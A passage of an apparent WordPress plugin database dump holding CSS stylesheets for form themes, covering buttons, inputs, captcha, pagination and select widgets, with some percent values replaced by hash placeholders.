background: #6C005E;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n		border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.button-reset {\r\n	color: #787878;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #F0EFEF;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n	float: right;\r\n	border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.wdform_page {\r\n	background: #FFFFFF;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 50px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_section_break2 {\r\n	color: #6C005E;\r\n	display: inline-block;\r\n	text-align: left;\r\n	font-size: 23px;\r\nmargin: 16px 10px 40px 0px;\r\n}\r\n\r\n.wdform_section_break {\r\n	color: #6C005E;\r\n	font-size: 23px;\r\nmargin: 16px 0px;\r\n}\r\n\r\n.wdform_section {\r\n	display: inline-block;\r\n}\r\nselect {\r\n	padding: 2px;\r\n	height: 26px;\r\n	border: 1px solid #B7B7B7;\r\nbackground: #F8F8F8;\r\n}\r\ninput[type=\"text\"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ninput[type=\"password\"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ninput[type=\"text\"]:focus{\r\n	outline: none;\r\n}\r\ninput[type=\"password\"]:focus{\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	outline: none;\r\n}\r\nselect {\r\n	outline: none;\r\n}\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n\r\n\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/03/date.png) no-repeat !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 22px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n\r\n\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n\r\n.if-ie-div-label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: \"Lucida Grande\", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #8A8A8A;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 0px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\ncolor: #6C005E;\r\nbackground-color: #FFF;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 29px;\r\ntext-align: center;\r\nvertical-align: bottom;\r\npadding: 5px 25px 0px 25px;\r\nfont-size: 16px;\r\nfont-weight:bold;\r\n}\r\n.page_active {\r\ncolor: #FFF;\r\ncursor: pointer;\r\nbackground-color: #6C005E;\r\ndisplay: inline-block;\r\nvertical-align: bottom;\r\nheight: 29px;\r\ntext-align: center;\r\nfont-size: 20px;\r\npadding: 5px 25px 0px 25px;\r\nline-height: 26px;\r\nfont-weight:bold;\r\n}\r\n.page_percentage_active {\r\npadding: 0px;\r\nmargin: 0px;\r\nborder-spacing: 0px;\r\nheight: 16px;\r\nline-height: 16px;\r\nfont-size: 15px;\r\nfloat: left;\r\ntext-align: right !important;\r\nz-index: 1;\r\nposition: relative;\r\nvertical-align: middle;\r\nbackground: #6C005E;\r\ncolor: #fff;\r\nborder-top-left-radius: 5px;\r\nborder-bottom-left-radius: 5px;\r\n}\r\n.page_percentage_deactive {\r\nheight: 16px;\r\nline-height: 16px;\r\nbackground-color: #F1F1F1;\r\ntext-align: left !important;\r\nmargin-bottom: 1px;\r\nborder-radius: 5px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n}\r\n\r\n.wdform_percentage_text {\r\nmargin: 3px 5px 3px 9px;\r\ncolor: #FFF;\r\nfont-size: 12px;\r\n}\r\n.wdform_percentage_title {\r\n	color: #6E6E6E;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 27px;\r\n	height: 27px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #4D792C;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 31px;\r\n	color: #fff;\r\n	border: 2px solid #68943B;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}',0),(3,'Theme 01 black','.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F0EFEF;\r\nborder: 1px solid #000000;\r\nborder-radius: 5px;\r\ncolor: #000000;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\ninput[type=\"radio\"]\r\n{\r\nborder:none !important;\r\noutline:none !important;\r\n}\r\ninput[type=\"checkbox\"]\r\n{\r\nborder:none !important;\r\noutline:none !important;\r\n}\r\na.ui-spinner-button\r\n{\r\nborder-radius:0px !important;\r\nbackground: none!important;\r\n}\r\n\r\na.ui-slider-handle {\r\nwidth: 13px;\r\nheight: 13px;\r\ntop: -4px;\r\nborder: 0px;\r\nborder-radius: 13px;\r\nbackground: #FAFAFA;\r\nborder: 3px solid #B1B1B1;\r\noutline: none;\r\n}\r\n\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #F5F5F5 !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type=\"text\"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n	color: #000;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\n\r\n\r\n.ui-slider-range {\r\n	background: #8A8A8A !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n	border: 0px solid #000 !important;\r\npadding-left:10px;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n}\r\n\r\n.sel-imul {\r\n	display: none;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 0px;\r\n	padding: 0px 0px 0px 2px;\r\n	font-size: 13px;\r\n	height: 22px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #F8F8F8;\r\n	border: 0px solid #D3D3D3;\r\n	background-position: right 2px center;\r\n	width: 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 23px;\r\n	width: 30px;\r\n	background: url([SITE_ROOT]/images/09/01.png) 50{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235} 50{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235} no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 0px;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	position: absolute;\r\n	border-radius: 0px;\r\n	height: 23px;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	}\r\n.file-picker {\r\n	width: 41px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/10/02/upload.png) no-repeat;\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\ncolor: #FFF;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 38px;\r\nline-height: 35px;\r\nbackground:url([SITE_ROOT]/images/10/next.png) no-repeat right #000;\r\npadding: 0px 36px 0 20px;\r\nvertical-align: middle;\r\nfont-size: 18px;\r\nborder-top-right-radius: 7px;\r\nborder-bottom-right-radius: 7px;\r\n}\r\n.previous-page div.wdform-page-button {\r\ncolor: #A2A2A2;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 37px;\r\nline-height: 35px;\r\nbackground:url([SITE_ROOT]/images/09/previous.png) no-repeat left #F1F1F1;\r\npadding: 0 20px 0 36px;\r\nvertical-align: middle;\r\nfont-size: 18px;\r\nborder-top-left-radius: 7px;\r\nborder-bottom-left-radius: 7px;\r\n}\r\n.button-submit {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #000;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n		border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.button-reset {\r\n	color: #787878;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #F0EFEF;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n	float: right;\r\n	border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.wdform_page {\r\n	background: #FFFFFF;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 50px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_section_break2 {\r\n	color: #000;\r\n	display: inline-block;\r\n	text-align: left;\r\n	font-size: 23px;\r\nmargin: 16px 10px 40px 0px;\r\n}\r\n\r\n.wdform_section_break {\r\n	color: #000;\r\n	font-size: 23px;\r\nmargin: 16px 0px;\r\n}\r\n\r\n.wdform_section {\r\n	display: inline-block;\r\n}\r\nselect {\r\n	padding: 2px;\r\n	height: 26px;\r\n	border: 1px solid #B7B7B7;\r\nbackground: #F8F8F8;\r\n}\r\ninput[type=\"text\"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ninput[type=\"password\"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ninput[type=\"text\"]:focus{\r\n	outline: none;\r\n}\r\ninput[type=\"password\"]:focus{\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	outline: none;\r\n}\r\nselect {\r\n	outline: none;\r\n}\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n\r\n\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/03/date.png) no-repeat !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 22px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n\r\n\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n\r\n.if-ie-div-label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: \"Lucida Grande\", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #8A8A8A;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 0px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\ncolor: #000;\r\nbackground-color: #FFF;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 29px;\r\ntext-align: center;\r\nvertical-align: bottom;\r\npadding: 5px 25px 0px 25px;\r\nfont-size: 16px;\r\nfont-weight:bold;\r\n}\r\n.page_active {\r\ncolor: #FFF;\r\ncursor: pointer;\r\nbackground-color: #000;\r\ndisplay: inline-block;\r\nvertical-align: bottom;\r\nheight: 29px;\r\ntext-align: center;\r\nfont-size: 20px;\r\npadding: 5px 25px 0px 25px;\r\nline-height: 26px;\r\nfont-weight:bold;\r\n}\r\n.page_percentage_active {\r\npadding: 0px;\r\nmargin: 0px;\r\nborder-spacing: 0px;\r\nheight: 16px;\r\nline-height: 16px;\r\nfont-size: 15px;\r\nfloat: left;\r\ntext-align: right !important;\r\nz-index: 1;\r\nposition: relative;\r\nvertical-align: middle;\r\nbackground: #000;\r\ncolor: #fff;\r\nborder-top-left-radius: 5px;\r\nborder-bottom-left-radius: 5px;\r\n}\r\n.page_percentage_deactive {\r\nheight: 16px;\r\nline-height: 16px;\r\nbackground-color: #F1F1F1;\r\ntext-align: left !important;\r\nmargin-bottom: 1px;\r\nborder-radius: 5px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n}\r\n\r\n.wdform_percentage_text {\r\nmargin: 3px 5px 3px 9px;\r\ncolor: #FFF;\r\nfont-size: 12px;\r\n}\r\n.wdform_percentage_title {\r\n	color: #6E6E6E;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 27px;\r\n	height: 27px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #4D792C;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 31px;\r\n	color: #fff;\r\n	border: 2px solid #68943B;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}',1),(4,'Theme 01 transparent (black button)','.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F0EFEF;\r\nborder: 1px solid #000000;\r\nborder-radius: 5px;\r\ncolor: #000000;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\ninput[type=\"radio\"]\r\n{\r\nborder:none !important;\r\noutline:none !important;\r\n}\r\ninput[type=\"checkbox\"]\r\n{\r\nborder:none !important;\r\noutline:none !important;\r\n}\r\na.ui-spinner-button\r\n{\r\nborder-radius:0px !important;\r\nbackground: none!important;\r\n}\r\n\r\na.ui-slider-handle {\r\nwidth: 13px;\r\nheight: 13px;\r\ntop: -4px;\r\nborder: 0px;\r\nborder-radius: 13px;\r\nbackground: #FAFAFA;\r\nborder: 3px solid #B1B1B1;\r\noutline: none;\r\n}\r\n\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #F5F5F5 !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type=\"text\"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n	color: #000;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\n\r\n\r\n.ui-slider-range {\r\n	background: #8A8A8A !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n	border: 0px solid #000 !important;\r\npadding-left:10px;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n}\r\n\r\n.sel-imul {\r\n	display: none;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 0px;\r\n	padding: 0px 0px 0px 2px;\r\n	font-size: 13px;\r\n	height: 22px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #F8F8F8;\r\n	border: 0px solid #D3D3D3;\r\n	background-position: right 2px center;\r\n	width: 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 23px;\r\n	width: 30px;\r\n	background: url([SITE_ROOT]/images/09/01.png) 50{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235} 50{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235} no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 0px;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	position: absolute;\r\n	border-radius: 0px;\r\n	height: 23px;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	}\r\n.file-picker {\r\n	width: 41px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/10/02/upload.png) no-repeat;\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\ncolor: #FFF;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 38px;\r\nline-height: 35px;\r\nbackground:url([SITE_ROOT]/images/10/next.png) no-repeat right #000;\r\npadding: 0px 36px 0 20px;\r\nvertical-align: middle;\r\nfont-size: 18px;\r\nborder-top-right-radius: 7px;\r\nborder-bottom-right-radius: 7px;\r\n}\r\n.previous-page div.wdform-page-button {\r\ncolor: #A2A2A2;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 37px;\r\nline-height: 35px;\r\nbackground:url([SITE_ROOT]/images/09/previous.png) no-repeat left #F1F1F1;\r\npadding: 0 20px 0 36px;\r\nvertical-align: middle;\r\nfont-size: 18px;\r\nborder-top-left-radius: 7px;\r\nborder-bottom-left-radius: 7px;\r\n}\r\n.button-submit {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: 